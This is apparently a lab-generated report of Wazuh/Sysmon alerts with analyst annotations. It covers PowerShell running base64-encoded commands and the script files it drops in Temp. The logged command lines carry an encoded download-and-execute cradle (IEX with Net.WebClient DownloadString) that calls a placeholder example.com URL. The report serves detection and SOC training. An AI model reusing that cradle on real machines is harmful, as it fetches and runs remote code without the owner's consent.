Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:30.152+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:30.152+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  114
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535330.2675904
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:27.5487001Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350117
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:27.053 ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ProcessId: 15812 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ParentProcessId: 14568 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:27.053
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15812
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:30.156+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:30.156+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  118
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535330.2683975
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:27.7747838Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350118
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:27.733 ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ProcessId: 15812 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bpcztlkl.1e1.ps1 CreationUtcTime: 2025-04-24 22:55:27.733 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:27.733
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15812
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bpcztlkl.1e1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:27.733
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:33.440+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:33.440+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  115
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535333.2686744
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:30.8278138Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350142
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:29.220 ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ProcessId: 5124 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ParentProcessId: 15812 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:29.220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c161-680a-d10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15812
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:33.445+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:33.445+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  119
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535333.2694811
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:31.1496733Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350143
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:31.110 ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ProcessId: 5124 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ssbpiznj.l5y.ps1 CreationUtcTime: 2025-04-24 22:55:31.110 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:31.110
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c161-680a-d10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ssbpiznj.l5y.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:31.110
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:43.204+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

